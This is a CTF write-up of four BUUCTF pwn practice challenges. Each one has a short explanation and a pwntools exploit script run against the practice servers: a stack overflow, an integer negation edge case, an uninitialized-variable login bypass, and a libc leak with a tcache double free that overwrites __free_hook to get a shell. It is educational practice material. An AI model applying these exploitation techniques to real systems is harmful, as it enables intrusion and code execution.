PWN-PRACTICE-BUUCTF-26

Published: 2023/12/10

    • 護網杯_2018_gettingstart
    • wustctf2020_number_game
    • picoctf_2018_are you root
    • ciscn_2019_en_3

護網杯_2018_gettingstart

The read into buf overflows. Overwrite v5 with 0x7FFFFFFFFFFFFFFF and v6 with 0x3FB999999999999A.

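    from pwn import *

    io = remote("node4.buuoj.cn", 29057)
    io.recvuntil(b"But Whether it starts depends on you.\n")

    v5 = 0x7FFFFFFFFFFFFFFF
    v6 = 0x3FB999999999999A  # IEEE-754 bit pattern of the double 0.1

    # Three 8-byte zero words of padding, then the two overwritten values
    payload = p64(0) * 3 + p64(v5) + p64(v6)
    io.send(payload)
    io.sendline(b"cat flag")
    io.interactive()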

wustctf2020_number_game

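neg performs two's-complement negation on its operand: it subtracts the operand from zero and writes the result back to the operand.
The same negation can be expressed as: invert the operand bitwise, then add 1.
0x80000000 inverted bitwise plus 1 is still 0x80000000, so sending -2147483648 is enough.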

    from pwn import *

    #io = process("./wustctf2020_number_game")
    io = remote("node4.buuoj.cn", 29209)
    elf = ELF("./wustctf2020_number_game")

    # -2147483648 is 0x80000000, which neg maps to itself
    io.sendline(b"-2147483648")
    io.sendline(b"cat flag")
    io.interactive()
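
The edge case described above, as an added C example that is not part of the original write-up and does not reproduce the challenge binary. The names neg32, neg32_not_inc, naive_abs, checked_abs and parse_abs are hypothetical, and the "test the sign, then negate" shape of naive_abs is an assumption. It shows that both formulations of negation map 0x80000000 to itself, and how an input check can reject that one value.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* x86 `neg` on a 32-bit value: 0 - x modulo 2^32. Computed on uint32_t
 * because -INT32_MIN on a signed int is undefined behaviour in C; the
 * cast back to int32_t wraps on gcc and clang. */
static int32_t neg32(int32_t x) {
    return (int32_t)(0u - (uint32_t)x);
}

/* The same operation written as "invert every bit, then add 1". */
static int32_t neg32_not_inc(int32_t x) {
    return (int32_t)(~(uint32_t)x + 1u);
}

/* Hypothetical naive absolute value: test the sign, then neg. */
static int32_t naive_abs(int32_t x) {
    return x < 0 ? neg32(x) : x;
}

/* Hardened form: INT32_MIN has no positive counterpart, so reject it.
 * Returns 0 and stores |x| in *out on success, -1 on rejection. */
static int checked_abs(int32_t x, int32_t *out) {
    if (x == INT32_MIN) return -1;
    *out = x < 0 ? -x : x;
    return 0;
}

/* Parse untrusted decimal text, then take a checked absolute value. */
static int parse_abs(const char *s, int32_t *out) {
    char *end;
    errno = 0;
    long v = strtol(s, &end, 10);
    if (errno == ERANGE || end == s || *end != '\0')
        return -1;                       /* malformed or out of long range */
    if (v < INT32_MIN || v > INT32_MAX)
        return -1;                       /* does not fit in 32 bits */
    return checked_abs((int32_t)v, out);
}

int main(void) {
    int32_t r = 0;
    printf("%d %d %d %d\n", neg32(INT32_MIN), neg32_not_inc(INT32_MIN),
           naive_abs(INT32_MIN), parse_abs("-2147483648", &r));
    return 0;
}
```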

picoctf_2018_are you root

Uninitialized verification vulnerability. Reference: PicoCTF_2018_are_you_root (uninitialized verification vulnerability)

    # -*- coding:utf-8 -*-
    from pwn import *

    #io = process('./PicoCTF_2018_are_you_root')
    io = remote('node4.buuoj.cn', 26285)

    def login(name):
        io.sendlineafter(b'>', b'login ' + name)

    def reset():
        io.sendlineafter(b'>', b'reset')

    def getFlag():
        io.sendlineafter(b'>', b'get-flag')

    # Name is 8 filler bytes followed by the 64-bit value 5
    login(b'a' * 0x8 + p64(0x5))
    reset()
    login(b'P1umH0')
    getFlag()

    io.interactive()

ciscn_2019_en_3

Leak libc through puts, then UAF + double free. Reference: ciscn_2019_en_3 tcache

    # -*- coding:utf-8 -*-
    from pwn import *

    #context.log_level = "debug"
    #io = process("./ciscn_2019_en_3")
    io = remote("node4.buuoj.cn", 29625)
    elf = ELF("./ciscn_2019_en_3")
    libc = ELF("./libc-2.27-18-x64.so")

    io.sendlineafter(b"What's your name?\n", b"P1umH0")
    io.sendlineafter(b"Please input your ID.\n", b"a" * 8)
    # The value printed after the ID is treated as setbuffer+231
    setbuffer_addr = u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) - 231
    libc_base = setbuffer_addr - libc.sym["setbuffer"]
    free_hook = libc_base + libc.sym["__free_hook"]
    system = libc_base + libc.sym["system"]

    def add(size, content):
        io.sendlineafter(b"Input your choice:", b"1")
        io.sendlineafter(b"Please input the size of story: \n", str(size).encode())
        io.sendlineafter(b"please inpute the story: \n", content)

    def edit():
        io.sendlineafter(b"Input your choice:", b"2")

    def show():
        io.sendlineafter(b"Input your choice:", b"3")

    def free(index):
        io.sendlineafter(b"Input your choice:", b"4")
        io.sendlineafter(b"Please input the index:\n", str(index).encode())

    def exit():
        io.sendlineafter(b"Input your choice:", b"5")

    #gdb.attach(io)
    #pause()
    add(0x20, b"aaaa")          #0
    add(0x20, b"/bin/sh\x00")   #1
    #pause()
    # Index 0 is freed twice (the double free)
    free(0)
    free(0)
    #pause()
    add(0x20, p64(free_hook))
    #pause()
    add(0x20, b"bbbb")
    #pause()
    add(0x20, p64(system))
    #pause()
    free(1)

    io.interactive()
